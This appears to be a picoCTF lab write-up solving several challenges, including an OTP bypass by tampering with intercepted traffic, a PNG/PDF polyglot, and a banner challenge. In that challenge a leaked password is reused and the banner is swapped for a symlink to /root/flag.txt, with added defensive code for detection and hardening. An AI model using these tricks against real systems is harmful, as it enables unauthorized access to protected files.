In the second step, intercept the traffic and simply delete the opt=data line and you will see the flag. 

 

(this is not a good exercise) 

 

Welcome, tyutu you sucessfully bypassed the OTP request. Your Flag: picoCTF{#0TP_Bypvss_SuCc3$S_e1eb16ed} 




Secret of the Polyglot 

Description 

The Network Operations Center (NOC) of your local institution picked up a suspicious file, they're getting conflicting information on what type of file it is. They've brought you in as an external expert to examine the file. Can you extract all the information from this strange file? Download the suspicious file here

 

 

Download the file and click to open it as a PDF; you can see part of the flag: 

 

1n_pn9_&_pdf_1f991f77} 

 

Check file type: 

 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ file flag2of2-final.pdf 

flag2of2-final.pdf: PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced 

                                                             

It shows up as a PNG, so make a copy: 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ cp flag2of2-final.pdf flag2png.png 

 

Open the PNG file and you will see another part of the flag: 

picoCTF{f1u3n7_ 

 

 

picoCTF{f1u3n7_1n_pn9_&_pdf_1f991f77} 
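The conflicting results above (file reports PNG, a PDF viewer still opens the document) are what a polyglot looks like from the outside. This added example, which is not part of the original write-up, walks the PNG chunk list and reports any second format found after the IEND chunk. It assumes the extra data is appended after the PNG, which is how the constructed sample is built; the layout of the challenge file itself is not shown on the page.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Magic numbers searched for outside the PNG data.
MAGICS = {
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip",
    b"\xff\xd8\xff": "jpeg",
    b"GIF8": "gif",
}


def png_chunk(kind, data):
    """Build one PNG chunk: length, type, data, CRC-32 over type + data."""
    crc = zlib.crc32(kind + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", crc)


def png_end_offset(blob):
    """Return the offset just past the IEND chunk, or None if not a PNG."""
    if not blob.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 12 <= len(blob):
        length, kind = struct.unpack(">I4s", blob[pos:pos + 8])
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC
        if kind == b"IEND":
            return pos if pos <= len(blob) else None
    return None  # truncated: no IEND chunk found


def identify(blob):
    """Return (format, offset) for every format the bytes can be read as."""
    formats = []
    end = png_end_offset(blob)
    if end is None:
        # Not a PNG: report whichever known magic the data starts with.
        for magic, name in MAGICS.items():
            if blob.startswith(magic):
                formats.append((name, 0))
        return formats
    formats.append(("png", 0))
    trailer = blob[end:]  # anything here is ignored by PNG decoders
    for magic, name in MAGICS.items():
        idx = trailer.find(magic)
        if idx != -1:
            formats.append((name, end + idx))
    return sorted(formats, key=lambda f: f[1])


def build_sample():
    """Constructed 1x1 greyscale PNG, alone and with a stub PDF appended."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    png = (PNG_SIG
           + png_chunk(b"IHDR", ihdr)
           + png_chunk(b"IDAT", zlib.compress(b"\x00\x00"))
           + png_chunk(b"IEND", b""))
    pdf_stub = b"%PDF-1.4\n% constructed stub, not a real document\n%%EOF\n"
    return png, png + pdf_stub


if __name__ == "__main__":
    plain, polyglot = build_sample()
    print("plain   :", identify(plain))
    print("polyglot:", identify(polyglot))
```

A file for which identify returns more than one entry deserves the treatment used above: inspect it once per reported format instead of trusting the extension or the first magic number.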




Unminify 

Description 

I don't like scrolling down to read the code of my website, so I've squished it. As a bonus, my pages load faster! Browse here, and find the flag! 

 

 

Just use Burp to intercept the traffic, or view the page source, and you will find the flag: 

 

picoCTF{pr3tty_c0d3_dbe259ce} 



Binary Search 

Description 

Want to play a game? As you use more of the shell, you might be interested in how they work! Binary search is a classic algorithm used to quickly find an item in a sorted list. Can you find the flag? You'll have 1000 possibilities and only 10 guesses. Cyber security often has a huge amount of data to look through - from logs, vulnerability reports, and forensics. Practicing the fundamentals manually might help you in the future when you have to write your own tools! You can download the challenge files here: 

Additional details will be available after launching your challenge instance. 

 

 

$ ssh -p 54277 ctf-player@atlas.picoctf.net 

ctf-player@atlas.picoctf.net's password:  

Permission denied, please try again. 

ctf-player@atlas.picoctf.net's password:  

Welcome to the Binary Search Game! 

I'm thinking of a number between 1 and 1000. 

Enter your guess: 500 

Higher! Try again. 

Enter your guess: 750 

Lower! Try again. 

Enter your guess: 625 

Lower! Try again. 

Enter your guess: 562 

Higher! Try again. 

Enter your guess: 593 

Higher! Try again. 

Enter your guess: 609 

Higher! Try again. 

Enter your guess: 617 

Congratulations! You guessed the correct number: 617 

Here's your flag: picoCTF{g00d_gu355_3af33d18} 

Connection to atlas.picoctf.net closed. 

                                    

 

endianness 

Description 

Know of little and big endian? Source nc titan.picoctf.net 55885 

 

 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc titan.picoctf.net 55885 

Welcome to the Endian CTF! 

You need to find both the little endian and big endian representations of a word. 

If you get both correct, you will receive the flag. 

Word: cmckz 

Enter the Little Endian representation: 7A6B636D63 

Correct Little Endian representation! 

Enter the Big Endian representation: 636D636B7A 

Correct Big Endian representation! 

Congratulations! You found both endian representations correctly! 

Your Flag is: picoCTF{3ndi4n_sw4p_su33ess_02999450} 

  

https://levelup.gitconnected.com/little-endian-and-big-endian-74ab6441b2a7  

 

picoCTF{3ndi4n_sw4p_su33ess_02999450} 



dont-you-love-banners 

Description 

Can you abuse the banner? The server has been leaking some crucial information on tethys.picoctf.net 55191. Use the leaked information to get to the server. To connect to the running application use nc tethys.picoctf.net 63833. From the above information abuse the machine and find the flag in the /root directory.

 
 

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc tethys.picoctf.net 55191 

SSH-2.0-OpenSSH_7.6p1 My_Passw@rd_@1234 

^C 

                                                                              

┌──(kali㉿kali)-[~/Downloads/pico] 

└─$ nc tethys.picoctf.net 63833         

************************************* 

**************WELCOME**************** 

************************************* 

  

what is the password?  

My_Passw@rd_@1234 

What is the top cyber security conference in the world? 

RSA 

Lol, good try, try again and good luck 

  

What is the top cyber security conference in the world? 

RSA Conference 

Lol, good try, try again and good luck 

  

What is the top cyber security conference in the world? 

BlackHat 

Lol, good try, try again and good luck 

  

What is the top cyber security conference in the world? 

DEF CON 

the first hacker ever was known for phreaking(making free phone calls), who was it? 

John Draper 

player@challenge:~$ ls -al 

ls -al 

total 20 

drwxr-xr-x 1 player player   20 Mar  9 16:39 . 

drwxr-xr-x 1 root   root 20 Mar  9 16:39 .. 

-rw-r--r-- 1 player player  220 Apr  4  2018 .bash_logout 

-rw-r--r-- 1 player player 3771 Apr  4  2018 .bashrc 

-rw-r--r-- 1 player player  807 Apr  4  2018 .profile 

-rw-r--r-- 1 player player  114 Feb  7 17:25 banner 

-rw-r--r-- 1 root   root 13 Feb  7 17:25 text 

player@challenge:~$ cat text     

cat text 

keep digging 

player@challenge:~$ history 

history 

1  ls -al 

2  cat text 

3  history 

player@challenge:~$ cat banner 

cat banner 

************************************* 

**************WELCOME**************** 

************************************* 

player@challenge:~$ cd .. 

cd .. 

player@challenge:/home$ ls -al 

ls -al 

total 0 

drwxr-xr-x 1 root   root   20 Mar  9 16:39 . 

drwxr-xr-x 1 root   root   29 Apr 19 18:54 .. 

drwxr-xr-x 1 player player 20 Mar  9 16:39 player 

player@challenge:/home$ cd / 

cd / 

player@challenge:/$ pwd 

pwd 

player@challenge:/$ ls -al 

ls -al 

total 4 

drwxr-xr-x   1 root   root  29 Apr 19 18:54 . 

drwxr-xr-x   1 root   root  29 Apr 19 18:54 .. 

-rwxr-xr-x   1 root   root   0 Apr 19 18:54 .dockerenv 

drwxr-xr-x   1 root   root 4096 Mar  9 16:38 bin 

drwxr-xr-x   2 root   root   6 Apr 24  2018 boot 

d---------   1 root   root  42 Mar  9 16:39 challenge 

drwxr-xr-x   5 root   root 340 Apr 19 18:54 dev 

drwxr-xr-x   1 root   root  66 Apr 19 18:54 etc 

drwxr-xr-x   1 root   root  20 Mar  9 16:39 home 

drwxr-xr-x   1 root   root  86 Mar  9 16:38 lib 

drwxr-xr-x   2 root   root  34 May 30  2023 lib64 

drwxr-xr-x   2 root   root   6 May 30  2023 media 

drwxr-xr-x   2 root   root   6 May 30  2023 mnt 

drwxr-xr-x   2 root   root   6 May 30  2023 opt 

dr-xr-xr-x 206 nobody nogroup 0 Apr 19 18:54 proc 

drwxr-xr-x   1 root   root   6 Mar  9 16:39 root 

drwxr-xr-x   1 root   root  22 Apr 19 18:54 run 

drwxr-xr-x   1 root   root  25 Apr 19 18:54 sbin 

drwxr-xr-x   2 root   root   6 May 30  2023 srv 

dr-xr-xr-x  13 nobody nogroup 0 Apr 19 18:54 sys 

drwxrwxrwt   1 root   root   6 Mar  9 16:39 tmp 

drwxr-xr-x   1 root   root  18 May 30  2023 usr 

drwxr-xr-x   1 root   root  17 May 30  2023 var 

 

 

 

player@challenge:/$ cd root 

cd root 

player@challenge:/root$ ls -al 

ls -al 

total 16 

drwxr-xr-x 1 root root 6 Mar  9 16:39 . 

drwxr-xr-x 1 root root   29 Apr 19 18:54 .. 

-rw-r--r-- 1 root root 3106 Apr  9  2018 .bashrc 

-rw-r--r-- 1 root root  148 Aug 17  2015 .profile 

-rwx------ 1 root root   46 Mar  9 16:39 flag.txt 

-rw-r--r-- 1 root root 1317 Feb  7 17:25 script.py 

player@challenge:/root$ cat flag.txt 

cat flag.txt 

cat: flag.txt: Permission denied 

player@challenge:/root$ cat script.py 

cat script.py 

  

import os
import pty

incorrect_ans_reply = "Lol, good try, try again and good luck\n"

if __name__ == "__main__":
    try:
        with open("/home/player/banner", "r") as f:
            print(f.read())
    except:
        print("*********************************************")
        print("***************DEFAULT BANNER****************")
        print("*Please supply banner in /home/player/banner*")
        print("*********************************************")

try:
    request = input("what is the password? \n").upper()
    while request:
        if request == 'MY_PASSW@RD_@1234':
            text = input("What is the top cyber security conference in the world?\n").upper()
            if text == 'DEFCON' or text == 'DEF CON':
                output = input(
                    "the first hacker ever was known for phreaking(making free phone calls), who was it?\n").upper()
                if output == 'JOHN DRAPER' or output == 'JOHN THOMAS DRAPER' or output == 'JOHN' or output== 'DRAPER':
                    scmd = 'su - player'
                    pty.spawn(scmd.split(' '))

                else:
                    print(incorrect_ans_reply)
            else:
                print(incorrect_ans_reply)
        else:
            print(incorrect_ans_reply)
            break

except:
    KeyboardInterrupt

  

player@challenge:/root$ who 

who 

player@challenge:/root$ whoami 

whoami 

player 

player@challenge:/root$ cd 

cd 

player@challenge:~$ ls -al 

ls -al 

total 20 

drwxr-xr-x 1 player player   20 Mar  9 16:39 . 

drwxr-xr-x 1 root   root 20 Mar  9 16:39 .. 

-rw-r--r-- 1 player player  220 Apr  4  2018 .bash_logout 

-rw-r--r-- 1 player player 3771 Apr  4  2018 .bashrc 

-rw-r--r-- 1 player player  807 Apr  4  2018 .profile 

-rw-r--r-- 1 player player  114 Feb  7 17:25 banner 

-rw-r--r-- 1 root   root 13 Feb  7 17:25 text 

 

So /root/flag.txt is accessible only to root. Reading script.py shows that it is the script that runs when a user logs in, and that it displays the contents of the banner file. So what if we replace that banner file with a symlink to /root/flag.txt, so that the script shows the content of flag.txt instead?

 

player@challenge:~$ rm banner 

rm banner 

player@challenge:~$ ln -s /root/flag.txt banner 

ln -s /root/flag.txt banner 

player@challenge:~$ exit 

exit 

logout 

What is the top cyber security conference in the world? 

DEF CON 

the first hacker ever was known for phreaking(making free phone calls), who was it? 

John Draper 

player@challenge:~$                                                                               

 

┌──(kali㉿kali)-[~] 

└─$ nc tethys.picoctf.net 63833 

picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_b3ee718e} 

  

what is the password?  

                          

 

 

picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_b3ee718e}
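
A defensive counterpart to the banner read in script.py, added here as an example and not part of the challenge or the original write-up: the naive read follows the symlink, while the hardened read opens the file with O_NOFOLLOW and validates the descriptor it actually opened. The function names, the size cap and the temporary directory layout (a constructed "secret" file standing in for /root/flag.txt) are assumptions.

```python
import os
import stat
import tempfile

MAX_BANNER_BYTES = 4096  # assumed cap; the challenge banner is 114 bytes

def read_banner_naive(path):
    """Same pattern as script.py: open() follows symlinks."""
    with open(path, "r") as f:
        return f.read()

def read_banner_hardened(path):
    """Return the banner text, or None if the file is not safe to display."""
    try:
        # O_NOFOLLOW: fail if the final path component is a symlink.
        # O_NONBLOCK: do not hang if a FIFO was swapped in for the banner.
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK)
    except OSError:
        return None
    try:
        st = os.fstat(fd)  # inspect the opened file itself, not the path again
        if not stat.S_ISREG(st.st_mode):
            return None
        if st.st_nlink != 1:  # a hard link could alias some other file
            return None
        if st.st_size > MAX_BANNER_BYTES:
            return None
        return os.read(fd, MAX_BANNER_BYTES).decode("utf-8", "replace")
    finally:
        os.close(fd)

def demo():
    """Constructed layout: 'secret' stands in for /root/flag.txt."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret")
        banner = os.path.join(d, "banner")
        with open(secret, "w") as f:
            f.write("constructed-secret\n")
        with open(banner, "w") as f:
            f.write("**WELCOME**\n")
        before = read_banner_hardened(banner)  # regular file: accepted
        os.remove(banner)
        os.symlink(secret, banner)  # same swap as rm banner / ln -s in the session
        return before, read_banner_naive(banner), read_banner_hardened(banner)

if __name__ == "__main__":
    print(demo())
```

O_NOFOLLOW guards only the final path component, so keeping the banner in a directory the unprivileged user cannot write to, or reading it after dropping privileges, remains the stronger fix.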